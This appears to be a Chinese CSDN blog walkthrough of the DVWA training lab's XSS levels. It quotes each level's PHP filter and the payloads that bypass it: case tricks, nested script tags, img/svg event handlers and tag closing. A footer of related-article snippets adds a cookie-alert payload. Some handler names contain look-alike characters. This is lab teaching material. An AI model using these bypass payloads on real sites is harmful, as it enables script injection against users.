xss学习 2

最新推荐文章于 2022-12-07 16:20:40 发布
最新推荐文章于 2022-12-07 16:20:40 发布
阅读量212 收藏
点赞数
分类专栏: xss 文章标签: xss 学习 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63231007/article/details/124523686
版权

Dvwa xss部分

xss (Reflected)

low

没有过滤,直接<script>alert('xss')</script>即可。

Medium

查看源码可知,

$name = str_replace( '<script>', '', $_GET[ 'name' ] );

对<script>进行了过滤,转化为空。因此可以大小写绕过,或者重写。

可构造:

<SCRipt>alert('xss')</SCRipt>

<scr<script>ipt>alert('xss')</script>

High

查看源码可知,

$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET['name'] );

对script有正则匹配,替换。script行不通,那就可以用img事件,svg事件。

构造:

<img src="#" οnerrοr=alert('xss')>

<svg οnlοad=alert('xss')>

xss (Stored)

low medium high 同reflected。不过前端对输入长度进行了限制,F12更改maxlength即可。

xss (DOM)

low

没有任何保护,所以在url栏里English直接构造<script>alert('xss')</script>即可

medium

查看源码可知,对<script进行了限制。

$default = $_GET['default'];
    
    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {
        header ("location: ?default=English");
        exit;
    }

stripos() 函数查找字符串在另一字符串中第一次出现的位置(不区分大小写)。

查看源码可知,把前面输入闭合掉即可 ,再写入img事件代码即可。

构造:

</option></select><img src="#" οnerrοr=alert('xss')>

</option></select><svg οnlοad=alert('xss')>

High

 switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }

发现是黑名单 注释掉就可以

构造:?default=English 空格 #<script>alert(/xss/)</script>

葫芦娃42
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS(跨站脚本攻击)详解
谢公子的博客
09-08 7万+
目录 XSS的原理和分类 XSS的攻击载荷 XSS可以插在哪里? XSS漏洞的挖掘 XSS的攻击过程 XSS漏洞的危害 XSS漏洞的简单攻击测试 反射型XSS: 存储型XSS: DOM型XSSXSS的简单过滤和绕过 ​XSS的防御 反射型XSS的利用姿势 get型 post型 利用JS将用户信息发送给后台 XSS的原理和分类 跨站脚本攻击XSS(Cros...
反射型XSS(Reflected)DVWA全等级绕过方法
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
11-30 3916
本站所有文章均为原创,欢迎转载,请注明文章出处[https://blog.csdn.net/weixin_43847838/article/details/110358618](https://blog.csdn.net/weixin_43847838/article/details/110358618).。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。
XSS漏洞
weixin_44022769的博客
03-25 694
前言 XSS即跨站脚本(Cross Site Script),发生在目标网站中目标用户的浏览器层面上,当用户浏览器渲染整个HTML文档的过程中出现了不被预期的脚本指令并执行时,XSS就会发生。 通俗地总结XSS为:想尽一切办法将你的脚本内容在目标网站中目标用户的浏览器上解析执行即可。 这个“跨”实际上属于浏览器的特性,而不是缺陷,造成“跨”这样的假象是因为绝大多数XSS攻击都会采用嵌入一段远程或者说第三方域上的脚本资源。 使用场景: 直接嵌入html<script>标签中 元素标签事
DVWA [XSS]
weixin_45253622的博客
05-17 364
目录 反射型XSS LOW Medium High Impossible 存储型XSS LOW Medium High Impossible DOM型XSS LOW Medium High Impossible 防御方式 反射型XSS LOW 源码如下: <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) &a.
代码审计——XSS
红队是青春
11-09 1477
代码审计——XSS篇(DVWA) 反射型XSS 反射型XSS——low级别 代码如下: 意思:函数"name",为可控,传入一个可控的变量值,不等于null空值,则直接echo输出固定语句Hello,加上所输入的可控变量值,无任何过滤。 框中输入:<script>alert('xss')</script> 反射型XSS——Medium级别 代码如下: 意思:同上,但传参时做了一些处理,多了一个str_replace()函数进行一个过滤,是将标签’script’进行过滤后再输
Xss学习研究平台源码.zip
05-12
在“Xss学习研究平台源码.zip”这个压缩包中,包含了一个用于学习和研究XSS攻击的测试平台。这个平台可以帮助开发者、安全研究员以及对网络安全感兴趣的人员深入理解XSS的工作原理,学习如何防御这种攻击。 XSS攻击...
XSS学习大全
05-02
"XSS学习大全"压缩包可能包含了各种XSS攻击实例、漏洞分析、防御策略以及相关工具的教程。这些资料可以帮助你深入理解XSS的原理,掌握如何发现和修复此类漏洞,同时了解黑客如何利用它们进行攻击。通过学习,你将...
基于机器学习建模的 XSS 攻击防范检测.docx
05-21
基于机器学习建模的 XSS 攻击防范检测.docx
xss-vuln学习通关总结
最新发布
08-24
2. **存储型XSS**:攻击脚本被存储在服务器的数据库中,任何访问该页面的用户都会受到攻击。这类攻击具有持久性和广泛影响,可能导致用户机器成为DDoS攻击的工具,同样用于窃取敏感信息。防范手段是:后端入库前对...
WEB渗透学习-XSS-labs靶场
04-20
2. **存储型XSS(Persistent XSS)**:这种类型的XSS更为危险,因为恶意脚本会被永久存储在服务器上,然后在其他用户访问相关页面时执行。在靶场中,你需要找到可以输入数据的地方,尝试插入恶意脚本,并查看是否能...
DVWA通关教程(下)
qq_50854662的博客
05-28 2089
XSS(DOM) XSS(DOM)是一种基于DOM树的一种代码注入攻击方式,可以是反射型的,也可以是存储型的,所以它一直被划分第三种XSS 与前两种XSS相比,它最大的特点就是不与后台服务器交互,只是通过浏览器的DOM树解析产生 除了js,flash等脚本语言也有可能存在XSS漏洞 难度(low) 审计代码 <?php # No protections, anything goes ?> 无任何过滤 所以我们可以构造XSS代码,访问链接: http://127.0.0.
XSS总结
weixin_43263451的博客
08-03 744
XSS总结简介跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 分类反射型XSS反射型只是简单的将用户输入的数据”反射”给浏览器,...
XSS
balu1589的博客
07-14 271
XSS 参考网址 https://www.freebuf.com/author/Black-Hole https://ctf-wiki.github.io/ctf-wiki/web/xss-zh/ XSS原理 测试代码 <html> <head> <meta http-equiv="Content-Type" content="text/html;...
DVWA之XSS
谢公子的博客
08-05 1947
  XSS XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储型的XSS与反射型的XSS。 DOM型的XSS由于其特殊性,常...
使用$_GET[]获取表单数据(PHP)
Missy_xw2018的博客
06-02 7383
在PHP中,$_GET数组获取使用GET方式提交的表单数据 语法:变量名=$_GET["name"]; //name指表单元素name属性值 $_GET[]与$_POST[]的区别: GET方式会将表单中的数据以URL字符串的形式发送给服务器 将test.php以GET方式提交,浏览器地址栏会显示 http://localhost/test.php?key1=value1&key2=v...
DVWA靶场-XSS(DOM型、反射型、存储型)
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
06-09 1810
DOM XSS DOM型XSS LOW DOM XSS 核心代码: Medium DOM XSS 核心代码: 绕过方法: High DOM XSS 核心代码: 绕过方式 Impossible DOM XSS 核心代码: Reflected XSS 反射型XSS Low Reflected XSS 核心代码 Medium Reflected XSS 核心代码 绕过方法 High Reflected XSS 核心代码 Impossible Reflected XSS
DVWA靶场下的xss漏洞练习及分析
记录学习,一起进步
12-07 619
DVWA靶场进行xss漏洞的练习记录及分析
XSS函数研究
shy的博客
03-12 1200
1,使用htmlspecialchars()函数将特殊字符转换为HTML实体 <?php $name=$_GET["name"]; $name=htmlspecialchars($name); ?> <input type='text' value='<?php echo $name?>'> 被转换的预定义的字符有: &:转换为&amp...
XSS攻击的简单过滤和绕过
caoxinjian423的博客
09-02 3339
一、常见的XSS攻击脚本 弹窗警告 <script>alert('XSS')</script> <script>alert(document.cookie)</script> 页面嵌套 <iframe> src=http://www.baidu.comwidth=10 height=10 border=10 </iframe> 重定向 <script>window.location="http://www.b.
XSS攻击详解:成因、挖掘与防护
这篇由PKAV出品的教程详细讲述了XSS攻击的原理和挖掘方法,非常适合XSS学习者。 首先,我们来看XSS攻击的种类。主要分为两种:反射型XSS和存储型XSS。 反射型XSS(Non-persistent XSS)是通过诱使用户点击含有恶意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值